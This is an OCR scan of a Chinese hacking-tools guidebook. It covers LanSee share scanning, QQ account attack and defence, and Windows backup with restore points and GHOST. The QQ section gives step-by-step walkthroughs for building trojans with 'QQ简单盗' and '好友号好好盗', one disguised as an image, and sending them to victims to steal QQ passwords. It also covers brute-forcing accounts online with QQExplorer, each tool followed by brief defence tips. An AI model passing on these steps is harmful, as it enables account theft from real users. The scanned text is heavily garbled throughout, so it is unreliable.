在 LanSee 主 窗口 中 单 击 “ 开 始 ” 按 钮 ， 搜 索 出 IP 地 址 后 ， 凤 接 看 会 搜索 共 至 资源 ， 
在 “ 共 至 资源 ”列表 框 中 可 看 到 每 台 计 算 机 开放 的 共 圣 资源 。 


设置 ”任务 ” 查 春 (V) ”组件 ”帮助 (H) 
和 人 也 
工具 选项 工具 显示 


= 人 @ | 
| 任务 浏览 结束 任务 | 组 件 管理 更 新 升级 | ”还 出 
TP 地 址 计算 机 名 工作 组 MAC 地 址 用 户 名 


半 192. 168 1.10 90.28. 34.09. 70 nD 
192. 168 1.1 8C 21 0A 89 ME BE 
192. 168. 1.55 90.28. 34. 09. 76. F4 
192. 168. 1!. 688 ZKG YORKGROUP C8.60. 00. 78. 58. AF 
192. 188.1.100 SZT-FC YORKGRDOUP 90.28.34.09. 70.49 
no 


[WE ATomntTomoTE1 电 wnevyromre NN on 34 MN 9m De 
Ml 


所 在 的 计算 机 “| 共享 文件 所 在 的 目录 
饲 ! 精 品 192. 168. 1. 88 | 引 | 可 45jps \\e2. 168.1.| 
局 192. 168.1.88 1212. jpe \\92. 168. 1. 
rofes... 192.168.1 88 aW1TO027. JPG WALe2 168 1 
192. 168. 1.88 - | 襄 4j1T0047.JPG \\1e2. 168. 1. 


书 抽 过 隐 芝 共 享 当 源 
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| 疯 局 声 允 三 寿 工具 (LanSee) V1.72( 示 注册] EE x 


QQ 账 与 攻防 


当 用 户 的 QQ 党 到 攻击 之 后 , 不 但 用 户 自己 的 安全 可 能 受到 威胁 , 还 极 有 
可 能 给 他 人 高 去 安全 隐患 ， 本 章 介 绍 对 QQ 账号 存在 的 安全 问题 进行 相应 的 
防御 措施 。 

O 三 种 QQ 账号 资 取 工 具 曝 光 

O 保护 QQ 密码 和 聊天 记录 


ST IF 一 一 


合 人 他 他 


工具 全 攻略 


15.1 


我 们 在 使 用 QQ 的 过 程 中 ， 经 第 会 听 到 朋友 的 QQ 账号 被 盗 了 。 那 么 ， 这 些 QQ 账号 
是 怎么 被 盗 的 呢 ? 平时 使 用 QQ 的 过 程 中 应 该 注意 哪些 方面 才能 防止 QQ 账号 被 盗 呢 ? 下 
面 以 三 种 常见 的 QQ 账 吕 盗 取 工 具 为 例 ， 曝 光 QQ 号 码 被 次 过程 并 给 出 防范 方法 。 


人 411 “QQ 简单 资 ” 盗 取 QQ 账号 星光 


“QQ 简单 资 ” 是 党 用 的 QQ 账号 盗 取 工具 ， 它 采用 进程 插入 技术 ， 使 得 软件 本 喘 不 会 产 
生 进 程 , 因而 很 难 被 发 现 。“QQ 徐 单 盗 ” 能够 自动 生成 木马 ， 只 要 将 该 木马 发 送 给 目标 用 户 ， 
并 使 其 在 目标 计算 机 中 运行 该 木马 ， 就 可 以 达到 咨 取 目 标 计 算 机 中 QQ 账号 的 目的 。 
1. QQ 盗号 曝光 
黑客 盗 取 QQ 账号 的 具体 操作 步骤 如 下 。 
STEP01: 打开 “QQ 简单 盗 ” 主 窗口 STEP02: 提示 用 户 查 看 测试 信件 信息 
。 QQ 简单 次 2.0 Bs Da | 


二 | 言 由 bP 簿 :| qqjdd@21cn, com 
竣 信 入 密码 | aqjda 


Pe 


Oo 


htitp:/ /www. qqgjdd com/QQP ass. asp | 


Es 单 击 “OK” 按 钮 。 
I EE 


下 载 并 解压 “QO 填写 收 /发 信 上 邮箱 、 发 
简单 盗 ” 压 缩 包 ， 打 ”信箱 密码 以 及 SMTP 服 
开 “QO 简单 盗 " 主 。” 务 器 ,并 单 击 “ 测 试 发 
窗口 。 信 ” 按 钮 。 


STEP03: 返回 主 界 面 STEP04: 选择 木马 图 标 
sled 


修改 日 期 
2013/8/5 22:28 
2013/8/5 22:28 
DANiTask.exe 2013/11/26 21:01 
加 ATL80.dll 2013/7/21 15:39 
图 atll00.dll 2013/7/21 17:05 
网 Bconv32.exe 2009/1/4 10:43 
图 bp_da.dll 2009/1/4 10:43 
|] BpSDA.exe 2009/1/4 10:43 
加 BPSRegWD.dIl 2009/1/4 10:43 
DBPpsUnlock.exe 2009/1/4 10:43 


目 bugreport.bd 2008/12/9 18:03 
< IT 


窗 夏 292006betsa3 的 安全 锁 防 护 , 中 己 后 88 登 陆 框 不 ; 
出 现 红 久 


规 如 下 哉 者 匠 陛 ; 让 撞 把 要 下 载 到 别人 机 器 上 的 PE 


covazse。 必 
[所 有 文件 计时 


单 击 “选择 木马 图 标 ” 按 钮 。 任意 选择 一 个 图 标 然后 单 击 “ 打 开 ” 按 钮 。 


-第 15 章 
QQ 账号 攻防 


洲 商号 SMTP 服务 器 时 要 注意 与 发 信 邮 箱 相对 应 ,否则 可 能 无 法 收 到 测试 


: 寺 二 二 件 
) 王 忌 全 ° 


STEP05: 返回 主 界 面 STEP06: 存储 木马 文件 


岂 7.21.18C 2013/12/12 21:05 
3.00.05C 2013/12/19 16:39 
有 58 帮 帮 2013/10/28 10:49 
W115 2013/1/23 9:46 
点 addins 2013/10/28 10:47 
ASPack 2013/11/19 14:21 
Backup 2013/10/22 9:48 
点 Baiduplayer 2013/11/6 8:40 
hh BBInside 2013/7/3 20:00 
BHO 2013/9/23 10:53 
Bbin 2013/11/8 10:03 
DD Bookmarks 2013/12/16 16:09 


次 破 92006beta3H] 安 全 向 防护， 中 马 后 虽 县 陆 框 不 : 
出 现 红 贸 


,i 


在 主 界面 查看 即将 单 击 “ 生 成 木马 ” ”选择 木马 存储 位 置 并 单 击 “ 保 存 ” 按 钮 。 
生成 的 木马 图 标 。 按钮 。 


STEP07: 木马 生成 提示 信息 STEP08: ”查看 已 生成 的 木马 
CR tN 本 DD) 2 ， a EE 


文件 (R)” 编 名 (E) 查看 V) 工具 Mm 帮助 (H) 
组 织 Y 包含 到 库 宁 * 


国 迅雷 下 载 


单 击 “ 确 定 ” 按 钮 。 在 存储 位 置 可 查看 已 经 生成 的 木马 。 


将 生成 的 木 瑟 发 送 给 目标 用 户 ， 只 要 目标 用 户 在 目标 计算 机 中 运行 该 程序 ， 黑 客 束 能 
够 获取 该 计算 机 中 的 QQ 账号 。 

2， 防范 “QQ 简单 盗 ” 

在 公共 场所 上 网 的 QQ 用 户 应 该 特别 注意 这 种 盗 取 QQ 账号 方法 ， 如 末 条 件 允 许 ， 最 好 先 
用 杀毒 软件 对 计算 机 进行 杀毒 再 进行 登录 。 同 时 , 也 不 要 轻易 接收 QQ 好 友 发 过 来 的 不 明文 件 ， 
因为 说 不 定 束 是 一 个 盗 取 QQ 账号 的 软件 ， 一 旦 运行 ，QQ 账号 束 没 有 任何 安全 性 可 言 了 。 


15.1.2 “好 友 号 好 好 盗 ” 盗 取 QQ 账号 曝光 


“好 友 号 好 好 盗 ” 是 一 球 远 程 盗 号 软件 ， 可 在 对 方 好 友 在 线 时 对 其 QQ 帐号 进行 盗 取 。 
该 软件 使 用 图 片 进行 伪装 ， 直 接 通 过 QQ 传 回 密码 ， 还 具有 加 密 传递 信息 功能 
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合 人 他 他 


FF 天 一 


工具 全 攻略 


该 工具 的 具体 使 用 步骤 如 下 。 
STEP01: ”打开 “好 友 号 好 好 盗 ” 主 窗口 


哆 刻 响 软件 工作 室 - 好 友 号 好 好 次 -For QQ2003 亚 


剑 响 软件 工作 室 


WWwW. xsoftware.com 
忆 虽 :77045750 


运行 父 数 5 制 天 四 @ 的 分 神 娄 


她 关于 


国 单 击 “选择 一 个 JPEG 
图 片 ” ce “浏览 " 
按钮 。 

STEP03: ”返回 主 界面 


鸣 侯 响 软件 工作 室 -好 友 号 好 好 次 -For QQ2003 亚 


输入 自己 的 
QO 号 码 。 


剑 响 软件 工作 宇 


WWWw. jxsoftware co 
QQ- 70 和 930 


运行 次数 | 强制 关闭 吧 的 分 着 数 


保 的 凤 三 她 关于 


项 择 一 个 JFEG 贸 睛 


我 比较 懒 《 二 键 OK) 


单 击 "浏览 " 按钮。 


STEP05: 返回 “好 友 号 好 好 资 ” 主 窗口 
克 剑 响 软 件 工作 室 -好 友 号 好 好 盗 -For QQ2003 弄 
剑 虽 软件 工作 宇 


Www.jxsoftware.co 
QQ: 77045950 


你 的 Qe 号 
12456782| 


茎 行 失 类 


强制 关闭 88 的 分 钟 数 “wy 关 于 
Pi 


rd 
“A 


诗 择 一 个 JPEG 图 片 


我 比较 懒 ‘一 键 


查看 选择 的 图 片 和 


指定 保存 的 文件 名 。 按钮 。 
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STEP02: ”选择 图 片 


"六 你 要 给 网 友 春 什么 图 片 ? CX 
‘COMEDEELELE =| 作 || 状语 nD 
组 织 ” 新 建文 件 夫 ~” 团 @@ 

三 图 

六 收藏 夫 图 片 库 3 排列 方式 ， 文件 夫 7 

妃 下 载 包括 : 1 个 位 置 

转 喜 面 HEOUUBUVUrYUOFAYBUFIrSAZIYrAr... HZ22JPI9 

5 最 近 访问 的 位 置 轿 11ljpe 响 292d5aal1679f37604a36d6dbjpg 

i 咽 20120510050121556jpg 路 20120510050525339jpg Fr 
司库 蜂 20120521053321255jpg 上 暑 20120527014350934jpg 遇 

本 ppTv 视 频 pe jpg 另 psb (37)jpg 一 

目 

加 视频 一 啊 QQ 才 图 20040122143704jpg 

辣 转 片 吴 QQ 截图 20040122143809.jpg 吴 QQ 埠 加 20140104160454jpg 

国 效 吴 QQ 截图 20140104202707jpg 吴 QQ 堆 图 20140104202737jpg 

) 迅 委 下 载 啊 QQ 城 图 20140416171641.jpg 吴 QQ 芒 图 20140808111457jpg 

目 

由 言 乐 里 QQ 图 片 20131206125242jpg 时 QQ 图 片 20131206125246jpg 

文件 首 (N): QQ 过 图 20040122143704jpg v ”|JPEG 图 片 


在 自己 的 计算 机 上 选择 
个 要 给 网 友 看 的 图 片 。 


STEPO4: 


侈 你 要 将 木马 放 在 哪 ? 
GO HEn , soa Ff) ， 


Fo | FE 


单 击 “打开 " 按钮， 
即 可 添加 该 图 片 。 


设置 木马 行 放 路 径 


p 回 | 迅雷 下 载 > “Se 
网 这 话 组 BP | 
baidu BaiduYunDownl 

4 1 琶 计算 机 download oad 

b 名 本 地 三 盘 (C;) 

be 本 地 磁盘 (D;) 

b En 本 地 磁盘 (E;) | 

| ?= 本 地 磁盘 (F;) 
是 MSN 上 的 “我 8 FavoriteVideo La 
人 和 网 闪 = 3 il 
文件 名 (N): QQ 


指定 保存 的 路 径 
以 及 文件 名 。 


STEP06: 


BaiduYunGuanji Fast File Splitter 


| EL 


heike hshyx6 
) mh 区 
了 “| 木马 文件 


[ aro |e 打开 (O) 了 


单 击 “打开 ， 
按钮 。 


上 


木马 制作 完毕 


聊天 的 好 友 了 ， 
对 方 QQ 的 时 间 。 


单 击 “ 生 成 木马 ” 单 击 “确定 " 按钮 。 此 时 就 可 以 将 生成 的 木马 发 给 
还 可 以 设置 运行 的 次 数 和 强制 关闭 


< 第 15 间 


QQ 账号 攻防 


如 果 对 选择 图 片 和 具体 操作 不 熟悉 ， 也 可 以 单 击 “ 我 比较 懒 (一 键 OK》 


二 示 ， 按钮 使 用 软件 自 带 的 图 片 ， 每 一 步 都 会 有 提示 。 


当 对 方 接收 到 市 木马 的 文件 之 后 ， 如 果 发 现 对 方 突然 下 线 ， 则 可 能 是 木马 已 经 起 作用 
了 。 等 对 方 再 次 上 线 之 后 ， 再 发 一 条 信息 过 去 ， 便 会 将 对 方 的 QQ 号 码 和 密码 通过 QQ 信 
县 发 送 过 来 。 


15.13 QQEXplorer 在 线 破解 QQ 账号 曝光 


QQ 在 即时 通信 和 领域 中 占有 举足轻重 的 地 位 ， 因 此 ，QQ 账号 的 安全 一 下 是 大 家 最 头疼 
的 问题 ， 稍 有 不 慎 ， 用 户 的 QQ 就 拱手 让 人 了 ， 即 使 注意 了 QQ 帐号 的 安全 ， 也 对 QQ 在 
线 破解 防不胜防 。 

1. 在 线 破 解 QQ 账号 

QQExplorer 是 一 亚 比 较 稼 用 的 在 线 破 解 QQ 密 但 的 工具 ， 蕊 能 强大 ， 设 症 简 便 。 可 以 
从 网 上 下 载 并 解压 QQExplorer 压缩 包 ， 双 击 QQExplorer 应 用 程序 图 标 ， 即 可 打开 
QQExplorer 主 界 面 ， 使 用 它 在 线 破 解 QQ 账 亏 的 具体 操作 步骤 如 下 。 
STEP01: 运行 QQExplorer STEP02:” 开始 破解 密码 


- 恬 加 或 喇 除 HTTF 代 理 服务 器 


服务 器 : |192. 168. 1. 102 端口 : Bo80 添加 a 中 | | 


[| 隆 


-添加 或 是 除 HTTF 代 理 服 务 器 
服务 器 : [EEC ”端口 : Bo8o 
用 户 名 : 弃 密码 : 弃 0 


一 1[ 自 定 关 探 则 一 | 通过 妊 ; 
w | A 


-代理 服务 器 列表 一 
oa | 1 ] 
QoS 碍 | | 


i 中 [| 开机 自动 运行 当前 执 刍 Bri Ett trl+tF1 a 厂 开机 自动 运行 ”当前 执 刍 FifttctrltFl =| 

注意 : 连接 失败 ，3 种 后 党 j 丈 重新 湛 接 。 
人 | 
DA 


恒 | CT 
+ 理 服 徊 性 别 表 * 
QQExplorer 1.26 和 开始 运 


二 二 


填写 QQ 号 码 ( 此 号 码 单 击 “ 添 加 & 测 ”图 检测 此 服务 器 是 否 单 击 “开始 ”按钮 ， 
必须 在 线 )、 代 理 服务 器 。 试 ”按钮 。 正常 。 即 开始 在 线 破解 密码 。 
的 IP 地 址 和 端口 号 码 。 


令 如 采 沉 得 寻找 QQ 代理 服务 器 列表 麻烦 , 可 使 用 一 些 现成 的 QQ 代理 公布 软件 。 


提示 


2. 防 汇 QQExplorer 在 线 破 解 

在 线 人 破解 改变 了 本 地 人 破解 那 种 被 动 的 破解 方式 ， 只 要 是 在 线 的 QQ 账号 都 可 以 破解 ， 
适用 泥 围 较 三 ， 因 此 一 定 要 当心 。 由 于 它 仍 然 采 用 穷 仅 法 技术 ， 因 此 在 枚 举 密 钥 位 数 长 度 
以 及 类 型 时 ， 校 验 时 间 很 长 ， 破 解 效 率 不 高 。 

这 种 方法 还 受到 计算 机 速度 、 网 速 等 诸多 因素 的 影响 ， 因 此 ， 对 于 这 种 人 破解 方式 ， 议 
莹 足够 复 琳 的 密码 是 一 种 非 弟 有效 的 预防 手段 。 
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窗 所 
PE IRsum 


合 人 他 他 


15.2 QQ 密码 和 聊天 记录 


平时 我 们 经 常会 听 说 他 人 的 QQ 号 但 被 盗 , 更 其 者 目 己 的 QQ 写 公 也 被 盗 了 ,一旦 QQ 
号 但 被 盗 ， 就 可 能 导致 一 些 重 要 的 信息 泄露 ， 从 而 造成 一 定 程度 的 损失 ， 那 么 用 户 惑 应 该 
采取 一 些 有 效 措施 以 防止 目 己 的 QQ 密码 泄露 。 


全 .2.1 十 期 修改 QQ 密码 


QQ 密码 使 用 时 间 过 长 ， 束 会 很 容易 被 他 人 破 详 ， 所 以 定期 修改 QQ 密码 很 有 必要 。 
修改 QQ 密码 需要 进行 以 下 操作 。 


STEP01: 打开 QQ 主 界 面 STEP02: ”修改 禹 码 


明 性 


BD 14-3-5 


B014-3-3 


* 确认 新 密码 


* 验证 码 :; | bv 
请 输入 图 中 字符 ， 不 区 分 大 小 写 


so 


Ho 17 11 


修改 密码 | 切换 帐号 车 二 出 | 最 中 
于 | 空 | 史上 吓 四 QQ OA 
在 QO 主 界面 左下 角 单 击 “ 主 菜单 ”图标 ， 在 打开 的 


菜单 中 单 击 “修改 密码 "命令 。 按钮 。 
STEP03: QQ 锋 码 修改 成 功 STEP04: QQ 下 线 通知 


四 下 线 和 通知 Ar 、 
蕉 走 您 ，QQ 密 码 修改 成 功 ! 
很 抱 款 ,由 于 您 的 密码 被 修改 或 帐号 进入 保护 


和 入 等 原因 , 出 于 安全 考虑 ， 请 关闭 并 重新 启 
你 还 可 以 查看 QQ 的 登录 记录 和 改 密 记录 吓 动 QQ/TM。 


建议 您 修改 密码 
查看 改 密 记 录 


QO 密码 修改 成 功 提示 信息 。 单 击 “ 重 新 登录 ”按钮 。 
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QQ 账号 攻 防 
STEP05: 重新 输入 QQ 密码 


您 梢 信 的 寓 侣 不 正确 ,原因 可 能 旺 : 

记 错 密 始 ; 未 区 分 字母 大 小 写 ; 未 开启 小 键盘 ， 
帐号 

337444925 


输入 新 密码 ， 单 击 “ 登 录 ” 按钮 即 可 重新 登录 QQ。 


15;2.2 申请 QQ 密码 保护 


QQ 密 你 是 为 了 加 强 QQ 安全 性 而 推出 的 一 于 密码 保护 功能 ,无 论 是 日 己 的 QQ 账号 被 
盗 ， 还 是 密码 瑟 记 了 ， 都 可 以 通过 QQ 密 保 来 找 回 日 己 的 QQ 或 者 重 置 密 码 。 

申请 QQ 密 你 需要 进行 以 下 操作 。 
STEP01: ”打开 QQ 主 界 面 STEP02: 设置 密 保 


密 保 工 具 帐号 保护 密码 管理 


窗 剑 问 融 
QQ 密码 , 快速 找 回 


功 论 碗 及 
由 用 户 选 定 的 3 个 问题 及 对 应 答 友 组 成 ， 专 门 用 于 找 回 密码 和 设置 其 他 密 保 。 主 要 包 合用 户 的 个 人 私有 信息 , 包 
括 : 班主 任 姓 名 、 配 偶 生 日 、 大 学 室友 等 。 ( 注 : 腾讯 公司 不 会 泄露 用 户 的 隐私 。)》 


风 脸 近 示 
密 保 问题 有 何 局 限 ? 

pn 易 引 起 安全 风险 ， 如 果 您 不 在 常用 地 登录 ， 可 能 无 法 通过 它 
Ne 修改 密 保 工具 

建议 您 绑 定 其 他 密 保 。 


应 用 帅 几 问题 
在 QO 主 界面 左下 角 单 击 “ 主 菜单 ”图标 , 选择 “安国 选择 “ 密 保 问 题 " 选项 。 图 单 击 “ 立 即 设置 " 
全 中 心 ” >“ 申 请 密码 保护 ” 菜单 命令 。 按钮 。 
STEP03: ” 密 保 问 题 填写 STEP04: ”确认 密 保 信息 


以 下 是 您 刚刚 设置 的 密 保 问题 ， 请 依次 做 出 回答 ,以 便 进行 确认 。 
: 您 小 学 班主 任 的 名 字 是 ? 
| XXX 


Ey 是 全 ， 
的 证 二 在 的 省 字 量 ? 题 二 : 您 初中 班主 任 的 名 字 ? 
入 宁 


您 高 中 班主 任 的 名 字 是 ? 


选择 密 保 问题 并 填写 答案 后 , 单 击 "下 一 步 按钮 。 根据 问题 输入 对 应 的 答案 后 ， 单 击 “ 下 一 步 ” 按 钮 。 
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> 


Pe 
2 工具 全 攻略 
全 人 人 他 


STEP05: ” 绑 定 密 保 手机 


与 是 人 保 品 题 
LT Cd NN ES mr 和 
86% 的 用 户 为 防止 QQ 被 次， 选择 继续 绑 定 密 保 于 机 ! 


请 输入 您 的 手机 号 : | 15816802015 


请 再 输入 一 遍 : | 15816802015 


腾讯 公司 不 会 绪 定 任何 服务 ， 不 会 闻 露 您 的 手机 号 。 隐 私 条 蒜 
部 分 省 份 电信 CDMA 手 机 和 小 灵通 手机 不 支持 纤 定 密 保 手机 。 


下 - 步 || 返回 


输入 绑 定 QO 的 手机 号 后 单 击 “ 下 一 步 ”按钮 。 


19.2.3 加 客 聊 天 记录 


STEP06: 设置 成 功 


(|】 藉 言 您 ， 成 功 设置 密 保 问 题 和 密 保 手 
机 ! 


体验 免费 验证 码 ， 立 即 下 载 QQ 安全 中 心 手机 片 
一 键 改 刻 


最 快 的 修改 QQ 密码 方式 


更 多 下 载 方式 >> 


FT 
- rt 一 手指 一 点 轻松 通过 验证 请 求 


| 消息 通知 


一 键 验 证 


成 功 设 置 密 保 问题 和 密 保 手 机 提示 信息 。 


在 日 常 聊天 时 ， 有 时 候 难 免 涉 及 一 些 个 人 隐私 信息 ， 如 果 QQ 聊天 记录 没有 加 密 ， 这 


坚 隐 私信 息 就 很 有 可 能 泄露 。 因 此 需要 局 用 聊天 记录 加 密 功 能 ， 防 患 于 未 然 。 


司 用 加 密 功 能 需要 进行 以 下 操作 。 
STEP01: 打开 QQ 主 界 面 

老乡 [8/19 

网 友 [5/14] 

同事 [5/8] 

工作 伙伴 [8/ 苛 

企业 好 友 [0/0] 

陌生 人 [/75] 


在 QQ 主 界面 左下 角 单 击 “ 打开 系统 设置 ”图 标 。 
STEP03:” 启用 消息 记录 加 密 


MM| 启用 消息 记录 加 密 


提示 问题: | 您 最 喜欢 听 的 音乐 是 什 么 ? 


公 选 “启用 消息 加 密 记 录 ” 复 选 框 ， 输入 口令 以 及 
加 密 口 令 提 示人 信息。 关闭 “系统 设置 ”对 话 框 即 可 


开启 消 息 加 密 。 
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STEPO2: 


打开 “系统 设置 "对 话 框 


© 0 
~ 
“© 
A | be w 


[人 


消 恩 记录: 站 过 出 QQ 对 生动 币 除 所 有 消 思 记录 
| 如 果 您 雪 要 删除 其 个 人 或 者 其 个 群 的 湛 生 记录 , 请 使用 消息 管理 器 
打开 党 生 管 理 二 
你 可 以 对 全 部 涪 导 记录 按 限 时 间 职 测 除 
出 除 沙皇 记录 | 
口 启用 清明 记录 如 客 


使 用 Q0 浏 | 临 吗 打开 QO 中 的 锥 接 


建议 安装 00 浏 蜗 圳 ， 和 将 强 访问 网 络 的 安全 性 ， 


安全 楂 块 及 时 更 新 ,可 保障 和 父 的 QQ 使 用 安全 ， 
(®) 有 安全 村 新 时 自动 为 芒 安 法 ,无 回 提 是 (推荐 ) 


〇 有 空 全 更 新 时 提醒 我 ， 不合 动 安装 


依次 选择 “安全 设置 ”> “消息 记录 ”。 
STEP04: ”输入 消息 密码 


再 次 登录 QQ 时 输入 QQ 密码 后 需要 再 次 输入 消息 密 
码 才能 登录 QQ。 


系统 和 数据 的 备份 与 恢复 


当 用 户 日 常 浏览 网 页 、 下 载 工 具 时 ， 有 时 一 些 病毒 、 木 马 会 夹带 在 其 中 ， 
导致 系统 受到 伤 SN 如 果 提 前 对 系统 和 数据 做 好 备份 ， 就 可 以 
及 时 地 进行 恢复 操作 ， 从 而 避免 不 必要 的 损失 。 


〇 操作 系统 备份 与 还 原 工具 
〇 用 户 数 据 备份 与 还 原 工 具 
O 使 用 恢复 工具 Recuva、FinalData 及 FinalRecovery 恢复 数据 


黑客 雪 
命 人 人 他 


16:1.1 使 用 还 原点 备份 与 还 原 系统 


Windows 系统 内 置 了 一 个 系统 备份 和 还 原 模块 ， 这 个 模块 就 叫做 还 原点 。 当 系统 出 现 
问题 时 ， 可 先 通 过 还 原点 尝试 修复 系统 。 
1. 创建 还 原点 
还 原点 在 Windows 系统 中 是 为 保护 系统 而 存在 的 。 由 于 每 个 被 创建 的 还 原点 中 都 包含 
了 该 系统 的 系统 设置 和 文件 数据 ， 因 此 用 户 完 全 可 以 使 用 还 原点 来 进行 备份 和 还 原 操作 系 
统 的 操作 。 现 在 详细 介绍 一 下 创建 还 原点 的 具体 操作 步骤 与 方法 。 


STEP01:” 右 击 采 面 上 的 “计算 机 ”图 标 ”STEP02: 打开 “系统 ”窗口 


打开 (QO) 
设备 管理 证 
管理 (G) 


\ 查看 有 关 计算 机 的 基本 信和 
断 芽 网络 开动 匡 (C),.， 3 i Windows 版 本 


jd Windows 7 旗舰 版 
创建 快捷 方式 [9) 版 权 所 有 司 2009 Microsoft ( 
删除 (D) 名 


重 命 名 (M) 


Service Pack 1 


在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 。 单 击 左 侧 的 “高 级 系统 设置 ”链接 。 
STEP03: 打开 “系统 属性 ”对 话 框 STEP04: 创建 还 原点 


计算 机 名 系统 保 扩 
肖 下 村 要 的 系统 更 改 ， 还 原 以 前 版 


J 接 计算 机 还 原 到 上 一 个 还 原点 ， 系统 还 原 (3)】.. 


创建 还 原点 
键入 可 以 帮助 您 识别 还 原点 的 描述 。 系统 会 自动 添加 当前 日 期 和 时 间 。 


切换 至 “系统 保护 ” 单 击 “ 创 建 ” 国 输入 还 原点 描述 。 单 击 “ 创 建 "按钮 。 
选项 卡 。 按钮 。 
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STEP05: 正在 创建 还 原点 STEP06: ”成功 创建 还 原点 


正在 创建 迁 原 癌 .… 
| 


查看 创建 进度 条 。 查看 提示 信息 并 单 击 “关闭 ”按钮 。 


个 在 Windows 系统 中 ， 还 原点 虽然 默认 只 备份 系统 安装 所 在 盘 的 数据 ， 
但 用 户 也 可 通过 设置 来 备份 非 系统 盘 中 的 数据 。 只 是 由 于 非 系 统 盘 中 的 数 
提示 据 过 多 ， 因 此 使 用 还 原点 备份 时 要 保证 计算 机 有 足够 的 磁盘 空间 。 


2. 使 用 还 原点 
成 功 创 建 还 原点 后 ， 当 系统 过 到 问题 时 就 可 通过 还 原点 来 还 原 系 统 ， 从 而 对 系统 进行 
修复 。 现 在 详细 介绍 一 下 还 原点 的 具体 使 用 方法 和 步骤 。 


STEP01: 打开 “系统 属性 ”对 话 杠 STEP02: ”还原 系统 文件 和 设置 


还 原 系统 文件 和 设置 


计算 机 名 [硬件 “|[ 高 级 | 系统 保护 


E a 了 全 系统 还 原 可 以 帮助 解决 使 计算机 运行 绎 慢 或 停止 响应 的 问题 。 
[9 强 扑 长 国 和 保 近 局 港 全 要 要 的 系统 更 改 ， 和 还原 以 前 版 


系统 还 原 2 
保 护 设置 - 
可 用 驱动 器 保护 
急 本 地 说 盘 CC:) (系统 ) 打开 
多 本 地 磁盘 0:) 关闭 
= 本 地 磁盘 下:) 关闭 = i 
切换 至 “系统 保护 ” 选 较 单 击 “系统 单 击 “ 下 一 步 ” 按 钮 。 
项 卡 。 还 原 ” 按 钮 。 
STEP03: 根据 日 期 和 时 间 选 取 还 原点 STEP04: ”确认 还 原点 信息 


将 计算 机 还 原 到 所 选 事件 之 前 的 状态 认 还 原点 
您 的 计算 机 将 被 还 原 到 下 面 “描述 ”字段 中 的 事件 之 前 所 处 的 状 


可 选择 让 原点 ? 
当前 时 区 : GWT+8:00 


日 期 和 时 间 “ 


时 间 : 2014/1/7 10:27:12 (GMT+8:00) 
描述 : 手动 : 系统 


驱动 器: 本 地 磁盘 CC:) (系统 ) 


和 


20147177 10:46:52 


2014/177 10:27:12 


如 黑 念 量 近 至 改 了 Windows 密码 ， 则 建议 您 创建 密码 重 置 盘 。 创建 


SO eofzn 


扫描 爱 影响 的 程序 以 ) 


= TE 


选中 一 个 还 原点 。 单 击 “下 一 步 ”按钮 。 单 击 “ 完 成 ”按钮 。 
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工具 全 攻略 
STEP05: ”查看 提示 信息 STEP06: ”准备 还 原 系 统 


确认 还 原点 | , 本 a 

全 乓 计算 机 村 被 还 了 EI 下 面 “ 括 术 ” 字 中 的 事件 之 前 所 旭 的 居 计算 机 名 系统 保护 

时 间 : 2014/177 10:27:12 (GMT+8:00) 于 由 公国 了 保护 消 不 坑 要 的 系统 更 改 ， 还 原 以 前 版 
撒 述 : 手动 : 系统 本 的 文件 。 入 过 所 未 扫兴 从 


驱动 器 : | 未 地 磁盘 C:) (系统 ) 系统 还 原 


避让 让 ni 而 上 一 个 还 原点， 


全 启动 后 ， 系 统 还 原 不 能 中 断 。 您 希望 继续 吗 ? 


除非 系统 还 原 已 完成 ， 否 则 无 法 将 其 撤 湛 。 如 果 在 安全 模式 下 或 从 “系统 恢复 选项 ” 菜 
单 运 行 系统 还 原 , 则 无 法 种 消 。 


“人 
oT 


正在 准备 还 原 系统 . 


多 

本 地 磁盘 人 各:) 

二 3 本 地磁 盘 眉 :) 
单 击 “ 是 ”按钮 。 计算 机 正在 准备 还 原 系统 。 
STEP07: ”还原 Windows 文件 和 设置 STEP08: 系统 还 原 完 成 


系统 还 原 完成 。 访 系统 已 经 还 原 为 2012710715 
0 


~ 清 稍 候 ,正在 还 原 WindcWs 广 件 和 设置 


沙 . WINndOWS 7 者 WE 


重新 启动 计算 机 查看 提示 信息 并 单 击 “关闭 ”按钮 。 


10.14.2 ”使 用 GHOST 备份 与 还 原 系统 


GHOST 全 名 为 Norton GHOST (诺顿 克隆 精 姑 Norton General Hardware Oriented 


System Transfer)， 是 美国 赛 门 铁 元 公司 开发 的 一 到 
硬盘 备份 和 还 原 工具 。GHOST 可 以 实现 FAT16、 


FAT32、NTFS、OS2 等 多 种 硬盘 分 区 格式 的 分 区 及 ptm 
使 盘 的 备份 和 还 原 。 在 这 些 功能 中 ， 数 据 备份 和 备 | To Image 


份 和 恢复 的 使 用 频率 特 高 ， 也 是 用 户 非 常 热 衷 的 备 pp z 
份 还 原 工 具 。 

1. 认识 GHOST 操作 界面 

GHOST 的 操作 界面 非常 徐 洁 实用 ， 用 户 从 来 
单 的 名 称 基 本 了 束 可 以 了 解 该 软件 的 使 用 方法 。 GHOST 操作 界面 
GHOST 常用 亲 单 命令 的 售 义 如 下 表 中 所 示 。 
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GHOST 常用 菜单 命令 的 含义 


名 称 (人 用 
Local 本 地 操作 ， 对 本 地 计算 机 的 硬盘 进行 操作 


Peer to Peer 


通过 点 对 点 模式 对 网 络 上 计算 机 的 硬盘 进行 操作 


Options 关于 GHOST 的 一 些 选 项 ， 使 用 默认 设置 即 可 
Help 使 用 帮助 
Quit 退出 GHOST 
Disk 人 厂 盘 

Partition 人 厂 盘 分 区 


To Partition 


To Image 


将 一 个 分 区 直接 复制 到 为 一 个 分 区 
将 一 个 分 区 备份 为 镜像 文件 


从 镜像 文件 恢复 分 区 ， 即 将 备份 的 分 区 还 原 


2. 使 用 GHOST 备份 系统 

使 用 GHOST 备份 系统 是 指 将 操作 系统 所 在 的 分 区 制作 成 一 个 GHO 镜像 文件 。 备份 时 
必须 在 DOS 环境 下 进行 ， 一 般 来 说 ， 目 前 的 GHOST 都 会 自动 安装 启动 菜单 ， 因 此 就 不 需 
要 再 在 启动 时 插入 光盘 来 引导 了 。 现在 详细 介绍 使 用 GHOST 备份 系统 的 具体 方法 和 步骤 。 


STEPOT1: 


From Image 


安装 GHOST 后 重启 计算 机 。 ”STEP02:” 进 入 “一 键 GHOST 主 菜单 ” 
Windows 启动 管理 器 


一 键 GHOST 主 菜单 


- 


选择 要 局 动 的 操作 系统 ， 或 按 Tab 选择 工具 : 
《使 用 葡 头 键 突出 显示 您 的 选择 ， 然 后 按 Enter。) 


EE 


工具 : 


